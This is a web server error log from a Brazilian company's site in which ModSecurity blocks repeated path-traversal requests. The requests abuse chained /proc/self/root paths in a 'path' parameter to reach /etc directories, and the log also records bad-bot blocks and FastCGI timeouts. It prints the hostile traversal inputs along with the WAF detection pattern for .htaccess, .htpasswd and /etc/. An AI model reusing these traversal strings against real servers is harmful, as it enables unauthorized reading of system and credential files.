[Thu Mar 19 05:40:00.254929 2026] [:error] [pid 27403:tid 140411632822016] [client 74.7.243.128:45616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2YBkFeYa1D6dYQnDF6wAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:40:04.485807 2026] [mime_magic:error] [pid 15826:tid 140411649607424] (70014)End of file found: [client 57.141.18.104:43396] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 05:40:07.967065 2026] [:error] [pid 19093:tid 140411658000128] [client 74.7.243.128:45632] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2Z1_V7PWP6ixUYl6SkQAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:40:13.077793 2026] [proxy_fcgi:error] [pid 17653:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:40982] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:40:15.851436 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:59860] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2b-oXxyEfFpUF8f_nYwAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:40:19.005053 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.228.61:39030] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abu2c-oXxyEfFpUF8f_nZQAAAUE"]
[Thu Mar 19 05:40:24.379863 2026] [:error] [pid 14269:tid 140411641214720] [client 74.7.243.128:57822] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2eAbLMZ6AikZjR9U0FQAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:40:33.787245 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.243.128:59346] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2geoXxyEfFpUF8f_nawAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:40:44.488882 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:33442] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2jPu8EFLIOrSqIpt2RwAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:40:56.542991 2026] [core:alert] [pid 14269:tid 140411540502272] [client 57.141.18.84:44642] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 05:40:57.135898 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:42054] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:41:09.259060 2026] [:error] [pid 14269:tid 140411565680384] [client 216.73.216.191:55617] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2pQbLMZ6AikZjR9U0LAAAABU"]
[Thu Mar 19 05:41:16.994565 2026] [:error] [pid 17887:tid 140411716749056] [client 216.73.216.191:56053] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2rAkwaGbbGflqUZCOBgAAAMM"]
[Thu Mar 19 05:41:17.658112 2026] [:error] [pid 14269:tid 140411725141760] [client 216.73.216.191:9080] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2rQbLMZ6AikZjR9U0LwAAAAI"]
[Thu Mar 19 05:41:21.027192 2026] [:error] [pid 27403:tid 140411599251200] [client 74.7.243.128:37158] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2sRkFeYa1D6dYQnDGKQAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:41:30.145834 2026] [proxy_fcgi:error] [pid 15826:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:42880] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:41:38.843603 2026] [:error] [pid 19093:tid 140411641214720] [client 74.7.243.128:36598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2wl_V7PWP6ixUYl6SwAAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:41:42.829090 2026] [:error] [pid 19093:tid 140411599251200] [client 216.73.216.191:43181] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2xl_V7PWP6ixUYl6SxAAAApE"]
[Thu Mar 19 05:41:53.133817 2026] [proxy_fcgi:error] [pid 19093:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43582] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:42:15.153840 2026] [proxy_fcgi:error] [pid 17653:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:44178] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:42:28.624623 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.244.43:46836] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abu29OoXxyEfFpUF8f_nmgAAAVQ"]
[Thu Mar 19 05:42:36.109708 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:44712] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:42:46.358091 2026] [:error] [pid 31803:tid 140411599251200] [client 216.73.216.191:14850] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu3BuyqAr6etmhZHNo6qQAAAFE"]
[Thu Mar 19 05:42:51.479476 2026] [:error] [pid 14269:tid 140411733534464] [client 216.73.216.191:60593] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu3CwbLMZ6AikZjR9U0YwAAAAE"]
[Thu Mar 19 05:42:54.342750 2026] [:error] [pid 19093:tid 140411658000128] [client 74.7.243.128:51286] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu3Dl_V7PWP6ixUYl6S6QAAAoo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:42:57.129847 2026] [proxy_fcgi:error] [pid 27293:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:45228] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:42:59.508776 2026] [:error] [pid 27403:tid 140411565680384] [client 74.7.243.128:41324] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu3ExkFeYa1D6dYQnDGYQAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:43:07.922479 2026] [:error] [pid 27293:tid 140411624429312] [client 74.7.243.128:41328] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu3G_-YZRR_7pZ7nDJkvAAAA84"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:43:10.571249 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:53250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu3HuoXxyEfFpUF8f_npQAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:43:17.431346 2026] [:error] [pid 19093:tid 140411582465792] [client 74.7.243.128:53258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu3JV_V7PWP6ixUYl6S9gAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:43:18.033908 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:45756] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:43:37.543532 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:53266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu3Ofu8EFLIOrSqIpt2qwAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:43:40.057843 2026] [proxy_fcgi:error] [pid 27293:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:46414] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:43:41.938411 2026] [:error] [pid 19093:tid 140411607643904] [client 74.7.243.128:48538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu3PV_V7PWP6ixUYl6S_QAAApA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
